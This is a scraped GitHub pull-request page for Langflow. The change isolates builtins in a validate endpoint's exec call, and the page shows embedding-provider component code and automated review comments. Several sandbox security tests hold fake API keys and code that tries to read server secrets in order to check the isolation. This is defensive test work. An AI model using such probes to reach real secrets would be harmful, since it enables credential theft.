-> list[str]:\n \"\"\"Fetch available models from the watsonx.ai API.\"\"\"\n try:\n endpoint = f\"{base_url}/ml/v1/foundation_model_specs\"\n params = {\n \"version\": \"2024-09-16\",\n \"filters\": \"function_embedding,!lifecycle_withdrawn:and\",\n }\n response = requests.get(endpoint, params=params, timeout=10)\n response.raise_for_status()\n data = response.json()\n models = [model[\"model_id\"] for model in data.get(\"resources\", [])]\n return sorted(models)\n except Exception: # noqa: BLE001\n logger.exception(\"Error fetching models\")\n return WATSONX_EMBEDDING_MODEL_NAMES\n\n def build_embeddings(self) -> Embeddings:\n provider = self.provider\n model = self.model\n api_key = self.api_key\n api_base = self.api_base\n base_url_ibm_watsonx = self.base_url_ibm_watsonx\n ollama_base_url = self.ollama_base_url\n dimensions = self.dimensions\n chunk_size = self.chunk_size\n request_timeout = self.request_timeout\n max_retries = self.max_retries\n show_progress_bar = self.show_progress_bar\n model_kwargs = self.model_kwargs or {}\n\n if provider == \"OpenAI\":\n if not api_key:\n msg = \"OpenAI API key is required when using OpenAI provider\"\n raise ValueError(msg)\n return OpenAIEmbeddings(\n model=model,\n dimensions=dimensions or None,\n base_url=api_base or None,\n api_key=api_key,\n chunk_size=chunk_size,\n max_retries=max_retries,\n timeout=request_timeout or None,\n show_progress_bar=show_progress_bar,\n model_kwargs=model_kwargs,\n )\n\n if provider == \"Ollama\":\n try:\n from langchain_ollama import OllamaEmbeddings\n except ImportError:\n try:\n from langchain_community.embeddings import OllamaEmbeddings\n except ImportError:\n msg = \"Please install langchain-ollama: pip install langchain-ollama\"\n raise ImportError(msg) from None\n\n transformed_base_url = transform_localhost_url(ollama_base_url)\n\n # Check if URL contains /v1 suffix (OpenAI-compatible mode)\n if transformed_base_url and transformed_base_url.rstrip(\"/\").endswith(\"/v1\"):\n # Strip /v1 suffix and log warning\n transformed_base_url = transformed_base_url.rstrip(\"/\").removesuffix(\"/v1\")\n logger.warning(\n \"Detected '/v1' suffix in base URL. The Ollama component uses the native Ollama API, \"\n \"not the OpenAI-compatible API. The '/v1' suffix has been automatically removed. \"\n \"If you want to use the OpenAI-compatible API, please use the OpenAI component instead. \"\n \"Learn more at https://docs.ollama.com/openai#openai-compatibility\"\n )\n\n return OllamaEmbeddings(\n model=model,\n base_url=transformed_base_url or \"http://localhost:11434\",\n **model_kwargs,\n )\n\n if provider == \"IBM watsonx.ai\":\n try:\n from langchain_ibm import WatsonxEmbeddings\n except ImportError:\n msg = \"Please install langchain-ibm: pip install langchain-ibm\"\n raise ImportError(msg) from None\n\n if not api_key:\n msg = \"IBM watsonx.ai API key is required when using IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n project_id = self.project_id\n\n if not project_id:\n msg = \"Project ID is required for IBM watsonx.ai provider\"\n raise ValueError(msg)\n\n from ibm_watsonx_ai import APIClient, Credentials\n\n credentials = Credentials(\n api_key=self.api_key,\n url=base_url_ibm_watsonx or \"https://us-south.ml.cloud.ibm.com\",\n )\n\n api_client = APIClient(credentials)\n\n params = {\n EmbedTextParamsMetaNames.TRUNCATE_INPUT_TOKENS: self.truncate_input_tokens,\n EmbedTextParamsMetaNames.RETURN_OPTIONS: {\"input_text\": self.input_text},\n }\n\n return WatsonxEmbeddings(\n model_id=model,\n params=params,\n watsonx_client=api_client,\n project_id=project_id,\n )\n\n msg = f\"Unknown provider: {provider}\"\n raise ValueError(msg)\n\n async def update_build_config(\n self, build_config: dotdict, field_value: Any, field_name: str | None = None\n ) -> dotdict:\n if field_name == \"provider\":\n if field_value == \"OpenAI\":\n build_config[\"model\"][\"options\"] = OPENAI_EMBEDDING_MODEL_NAMES\n build_config[\"model\"][\"value\"] = OPENAI_EMBEDDING_MODEL_NAMES[0]\n build_config[\"api_key\"][\"display_name\"] = \"OpenAI API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"display_name\"] = \"OpenAI API Base URL\"\n build_config[\"api_base\"][\"advanced\"] = True\n build_config[\"api_base\"][\"show\"] = True\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n elif field_value == \"Ollama\":\n build_config[\"ollama_base_url\"][\"show\"] = True\n\n if await is_valid_ollama_url(url=self.ollama_base_url):\n try:\n models = await get_ollama_models(\n base_url_value=self.ollama_base_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n else:\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n build_config[\"truncate_input_tokens\"][\"show\"] = False\n build_config[\"input_text\"][\"show\"] = False\n build_config[\"api_key\"][\"display_name\"] = \"API Key (Optional)\"\n build_config[\"api_key\"][\"required\"] = False\n build_config[\"api_key\"][\"show\"] = False\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"project_id\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = False\n\n elif field_value == \"IBM watsonx.ai\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=self.base_url_ibm_watsonx)[0]\n build_config[\"api_key\"][\"display_name\"] = \"IBM watsonx.ai API Key\"\n build_config[\"api_key\"][\"required\"] = True\n build_config[\"api_key\"][\"show\"] = True\n build_config[\"api_base\"][\"show\"] = False\n build_config[\"ollama_base_url\"][\"show\"] = False\n build_config[\"base_url_ibm_watsonx\"][\"show\"] = True\n build_config[\"project_id\"][\"show\"] = True\n build_config[\"truncate_input_tokens\"][\"show\"] = True\n build_config[\"input_text\"][\"show\"] = True\n elif field_name == \"base_url_ibm_watsonx\":\n build_config[\"model\"][\"options\"] = self.fetch_ibm_models(base_url=field_value)\n build_config[\"model\"][\"value\"] = self.fetch_ibm_models(base_url=field_value)[0]\n elif field_name == \"ollama_base_url\":\n # # Refresh Ollama models when base URL changes\n # if hasattr(self, \"provider\") and self.provider == \"Ollama\":\n # Use field_value if provided, otherwise fall back to instance attribute\n ollama_url = field_value or self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n build_config[\"model\"][\"value\"] = models[0] if models else \"\"\n except ValueError:\n await logger.awarning(\"Failed to fetch Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n build_config[\"model\"][\"value\"] = \"\"\n\n elif field_name == \"model\" and self.provider == \"Ollama\":\n ollama_url = self.ollama_base_url\n if await is_valid_ollama_url(url=ollama_url):\n try:\n models = await get_ollama_models(\n base_url_value=ollama_url,\n desired_capability=DESIRED_CAPABILITY,\n json_models_key=JSON_MODELS_KEY,\n json_name_key=JSON_NAME_KEY,\n json_capabilities_key=JSON_CAPABILITIES_KEY,\n )\n build_config[\"model\"][\"options\"] = models\n except ValueError:\n await logger.awarning(\"Failed to refresh Ollama embedding models.\")\n build_config[\"model\"][\"options\"] = []\n\n return build_config\n"
🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2018-2019, the ollama_base_url handler ignores the incoming
field_value and always uses self.ollama_base_url, which can cause stale model
lists; change the handler to use a local variable (e.g., ollama_url =
field_value or self.ollama_base_url) and then pass that variable to
is_valid_ollama_url and get_ollama_models so updates use the new value when
provided while still falling back to the instance attribute if field_value is
empty.

Comment on lines +2038 to +2056
"input_text": {
"_input_type": "BoolInput",
"advanced": true,
"display_name": "Include the original text in the output",
"dynamic": false,
"info": "",
"list": false,
"list_add_label": "Add More",
"name": "input_text",
"placeholder": "",
"required": false,
"show": false,
"title_case": false,
"tool_mode": false,
"trace_as_metadata": true,
"track_in_telemetry": true,
"type": "bool",
"value": true
},
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟡 Minor

Telemetry/privacy check for input_text flag.

The field tracks as telemetry. Ensure only the boolean is captured (no raw text) and that analytics pipelines don’t infer content from it. If uncertain, disable tracking.

🤖 Prompt for AI Agents
In src/backend/base/langflow/initial_setup/starter_projects/Nvidia Remix.json
around lines 2038 to 2056, the input_text field is currently configured to be
traced and tracked which risks leaking raw text; change configuration so only
the boolean value is recorded — set trace_as_metadata to false and
track_in_telemetry to false (or remove those flags) and verify no other
properties (placeholders, default value, or surrounding logic) send or derive
the original text to analytics; if you cannot guarantee analytics will only
receive a boolean, disable telemetry entirely for this field.

Comment thread src/backend/tests/unit/api/v1/test_validate.py Outdated
Comment thread src/lfx/src/lfx/custom/sandbox.py Outdated
Comment thread src/lfx/src/lfx/custom/sandbox.py Outdated
Comment thread src/lfx/tests/unit/custom/test_sandbox_isolation.py Outdated
Comment on lines +29 to +31
server_api_key = "sk-secret-key-12345"
server_db_password = "db_password_secret"
server_config = {"api_key": server_api_key, "database_url": "postgresql://user:password@localhost/db"}
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

Fake API keys will trigger gitleaks and other secret scanners

The hard‑coded strings like:

  • server_api_key = "sk-secret-key-12345" (Line 29)
  • self.api_key = "sk-secret-12345" (Line 63)

match generic API‑key patterns and are already being flagged by gitleaks. Even though these are clearly test values, they will cause CI noise or failures.

Consider changing them to values that don’t resemble real keys (and avoid common prefixes like sk-), e.g.:

-    server_api_key = "sk-secret-key-12345"
+    server_api_key = "FAKE_SERVER_API_KEY_FOR_TESTS"
@@
-            self.api_key = "sk-secret-12345"
+            self.api_key = "FAKE_SERVER_CONFIG_API_KEY_FOR_TESTS"

or add explicit allowlist annotations consistent with your secret‑scanning configuration.

Also applies to: 63-66

🧰 Tools
🪛 Gitleaks (8.29.0)

[high] 29-29: Detected a Generic API Key, potentially exposing access to various services and sensitive operations.

(generic-api-key)

🤖 Prompt for AI Agents
In src/lfx/tests/unit/custom/test_sandbox_security.py around lines 29-31 and
63-66, replace hard-coded strings that resemble real API keys (e.g. values with
sk- or sk-secret prefixes) with clearly non-secret test identifiers or reference
test fixtures/env vars, or add an explicit secret-scan allowlist annotation per
our CI configuration; ensure new values do not match common API-key patterns
(avoid prefixes like "sk-", long hex/base64 blobs, or "secret") and prefer
simple labels such as "test-api-key-1" or read the value from a test-only
config/env var, updating tests accordingly.

Comment on lines +33 to +50
code = """
def test():
# Try to access server's Python variables containing secrets
# If isolation is broken, these would be accessible
return server_api_key, server_db_password, server_config
"""
code_obj = compile(code, "<test>", "exec")
exec_globals = {}

execute_in_sandbox(code_obj, exec_globals)

# Call the function
test_func = exec_globals["test"]

# CRITICAL: Should raise NameError - server secrets are not accessible
# This is what prevents credential theft
with pytest.raises(NameError):
test_func()
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

exec_globals["test"] never populated by execute_in_sandbox

All tests in this file follow the pattern:

  1. exec_globals = {}
  2. execute_in_sandbox(code_obj, exec_globals)
  3. test_func = exec_globals["test"]
  4. with pytest.raises(NameError): test_func()

However, the current execute_in_sandbox implementation constructs its own sandbox_globals dict, merges exec_globals into it, and then executes exec(code_obj, sandbox_globals, sandbox_locals) without writing anything back to exec_globals. That means exec_globals remains empty and exec_globals["test"] will raise KeyError before your pytest.raises(NameError) assertions ever run. The same issue affects every test using this pattern (lines 33‑50, 69‑86, 98‑129, 140‑160, 172‑188, 195‑214, 226‑249, 261‑275).

Two options:

  • Adjust tests to assert on the exception raised by execute_in_sandbox itself (and call test() from within the code string), e.g.:
-    code = """
-def test():
-    # Try to access server's Python variables containing secrets
-    # If isolation is broken, these would be accessible
-    return server_api_key, server_db_password, server_config
-"""
+    code = """
+def test():
+    # Try to access server's Python variables containing secrets
+    # If isolation is broken, these would be accessible
+    return server_api_key, server_db_password, server_config
+
+# Call inside the sandbox so NameError is raised during execute_in_sandbox
+test()
+"""
@@
-    code_obj = compile(code, "<test>", "exec")
-    exec_globals = {}
-
-    execute_in_sandbox(code_obj, exec_globals)
-
-    # Call the function
-    test_func = exec_globals["test"]
-
-    # CRITICAL: Should raise NameError - server secrets are not accessible
-    # This is what prevents credential theft
-    with pytest.raises(NameError):
-        test_func()
+    code_obj = compile(code, "<test>", "exec")
+    exec_globals = {}
+
+    # CRITICAL: Should raise NameError - server secrets are not accessible
+    # This is what prevents credential theft
+    with pytest.raises(NameError):
+        execute_in_sandbox(code_obj, exec_globals)
  • Or, if the intended contract is that sandboxed definitions are exported back into exec_globals, update execute_in_sandbox to propagate selected names (e.g., functions) out of the internal sandbox_globals into exec_globals.

Right now, the tests and the sandbox API are not aligned, and the assertions won’t be exercising the intended NameError behavior.


🏁 Script executed:

#!/bin/bash
# Find execute_in_sandbox function definition
rg -n "def execute_in_sandbox" --type py

Length of output: 114


🏁 Script executed:

#!/bin/bash
# Find where execute_in_sandbox is imported/used in test file
rg -n "execute_in_sandbox" src/lfx/tests/unit/custom/test_sandbox_security.py -B2 -A2

Length of output: 1022


🏁 Script executed:

#!/bin/bash
# Get the full test file to understand structure
cat src/lfx/tests/unit/custom/test_sandbox_security.py

Length of output: 9640


🏁 Script executed:

#!/bin/bash
# Find all Python files that might contain execute_in_sandbox definition
fd -e py -x rg -l "def execute_in_sandbox" {} \;

Length of output: 35


🏁 Script executed:

#!/bin/bash
# Search more broadly for execute_in_sandbox in the codebase
rg -n "execute_in_sandbox" --type py -C3

Length of output: 12538


🏁 Script executed:

#!/bin/bash
# Get the execute_in_sandbox function implementation
sed -n '179,250p' src/lfx/src/lfx/custom/sandbox.py

Length of output: 2584


🏁 Script executed:

#!/bin/bash
# Get full sandbox.py file for complete context
cat src/lfx/src/lfx/custom/sandbox.py

Length of output: 8824


Tests fail with KeyError before asserting intended NameError behavior

The review comment is correct. In execute_in_sandbox, definitions created by exec(code_obj, sandbox_globals, sandbox_locals) are placed into sandbox_globals, not the passed-in exec_globals parameter. Since exec_globals is never updated after execution, the test pattern fails at exec_globals["test"] with KeyError before the NameError assertions can run.

This affects all tests in the file: lines 33–50, 69–86, 98–129, 140–160, 172–188, 195–214, 226–249, 261–275.

Choose one solution:

  1. Move the function call into the code string so NameError is raised during execute_in_sandbox:
code = """
def test():
    return server_api_key, server_db_password, server_config
test()
"""
with pytest.raises(NameError):
    execute_in_sandbox(code_obj, exec_globals)
  1. Update execute_in_sandbox to propagate selected definitions (e.g., functions) back into exec_globals after execution.

@github-actions
Copy link
Copy Markdown
Contributor

github-actions Bot commented Dec 19, 2025

Frontend Unit Test Coverage Report

Coverage Summary

Lines Statements Branches Functions
Coverage: 17%
16.65% (4707/28254) 9.97% (2177/21831) 10.94% (679/6201)

Unit Test Results

Tests Skipped Failures Errors Time
1830 0 💤 0 ❌ 0 🔥 25.311s ⏱️

Comment thread src/lfx/src/lfx/custom/sandbox.py Outdated
Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Should we make some of this lazy?

Comment thread src/lfx/src/lfx/custom/sandbox.py Outdated
Comment thread src/lfx/src/lfx/custom/sandbox.py Outdated
@jordanrfrazier jordanrfrazier changed the title ref: add sandbox to exec call in validate endpoint ref: use isolated builtins to exec call in validate endpoint Jan 5, 2026
@jordanrfrazier
Copy link
Copy Markdown
Collaborator Author

Converting to draft for now. Need to have a way to identify core components before this can be merged, otherwise core components with "dangerous" builtins will fail 1) Updates and 2) Check and Save (during validation).

once we have a method to identify core components, we can also go ahead and add this isolation layer to execution.

@github-actions github-actions Bot added enhancement New feature or request and removed enhancement New feature or request labels Jan 6, 2026
@github-actions github-actions Bot added enhancement New feature or request and removed enhancement New feature or request labels Jan 6, 2026
@github-actions github-actions Bot added enhancement New feature or request and removed enhancement New feature or request labels Jan 6, 2026
@github-actions github-actions Bot added enhancement New feature or request and removed enhancement New feature or request labels Jan 6, 2026
@github-actions github-actions Bot added enhancement New feature or request and removed enhancement New feature or request labels Jan 7, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

DO NOT MERGE Don't Merge this PR enhancement New feature or request

Projects

None yet

Development

Successfully merging this pull request may close these issues.

2 participants